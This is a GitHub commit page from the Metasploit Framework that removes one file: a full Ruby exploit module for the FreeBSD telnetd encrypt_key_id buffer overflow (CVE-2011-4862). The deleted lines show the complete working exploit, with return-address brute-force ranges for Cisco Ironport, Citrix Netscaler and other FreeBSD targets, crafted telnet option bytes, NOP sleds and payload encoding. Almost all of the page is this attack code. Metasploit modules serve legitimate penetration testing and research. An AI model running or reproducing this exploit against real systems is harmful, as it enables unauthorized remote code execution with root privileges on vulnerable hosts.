Permalink
Browse files

Merge branch 'release/20120110000001' of framework.github.com:rapid7/…

…metasploit-framework into release/20120110000001
  • Loading branch information...
2 parents b3925c4 + f40df69 commit 5700bf9db4792ff348cdb79c576d189191cdfcb0 @jcran jcran committed Jan 13, 2012
Showing with 0 additions and 134 deletions.
  1. +0 −134 modules/exploits/freebsd/telnet/telnet_encrypt_keyid_bruteforce.rb
View
134 modules/exploits/freebsd/telnet/telnet_encrypt_keyid_bruteforce.rb
@@ -1,134 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
-
- include Msf::Exploit::Remote::Tcp
- include Msf::Exploit::Brute
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'FreeBSD based telnetd encrypt_key_id brute force',
- 'Description' => %q{
- This module exploits a buffer overflow in the encryption option handler of the
- FreeBSD telnet service.
- },
- 'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
- 'References' =>
- [
- ['BID', '51182'],
- ['OSVDB', '78020'],
- ['CVE', '2011-4862'],
- ['URL', 'http://www.exploit-db.com/exploits/18280/']
- ],
- 'Privileged' => true,
- 'Payload' =>
- {
- 'Space' => 128,
- 'BadChars' => "\x00",
- },
- 'Platform' => [ 'bsd' ],
- 'Targets' =>
- [
- #
- # specific targets
- #
- [ 'Cisco Ironport 7.x Bruteforce',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805cffd },
- 'Stop' => { 'Ret' => 0x0805aa00 },
- 'Step' => 8
- }
- }
- ],
-
- [ 'Citrix Netscaler 9.x',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805bffd },
- 'Stop' => { 'Ret' => 0x08059000 },
- 'Step' => 8
- }
- }
- ],
-
- [ 'Other FreeBSD based targets',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805fffd },
- 'Stop' => { 'Ret' => 0x08050000 },
- 'Step' => 8
- }
- }
- ],
-
-
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => 'Dec 23 2011'))
-
- register_options(
- [
- Opt::RPORT(23),
- ], self.class )
- end
-
- def brute_exploit(addrs)
- curr_ret = addrs['Ret']
- begin
- connect
-
- sock.get_once
- print_status('Initiate encryption mode ...')
-
- req = ''
- req << "\xff\xfa\x26\x00\x01\x01\x12\x13"
- req << "\x14\x15\x16\x17\x18\x19\xff\xf0"
- req << "\x00"
-
- sock.put(req)
- sock.get_once
- req = ''
- print_status("Trying return address 0x%.8x..." % curr_ret )
- print_status('Sending first payload ...')
-
- req << "\xff\xfa\x26\x07"
- req << "\x00"
- req << make_nops(71)
- penc = payload.encoded.gsub("\xff", "\xff\xff")
- req << [curr_ret].pack('V')
- req << [curr_ret].pack('V')
-
- req << make_nops(128)
- req << penc
- req << "\x90\x90\x90\x90"
- req << "\xff\xf0"
- req << "\x00"
-
- sock.put(req)
- sock.get_once
- print_status('Sending second payload ...')
- sock.put(req)
-
- disconnect
- handler
- rescue
- end
- end
-
-end

0 comments on commit 5700bf9

Please sign in to comment.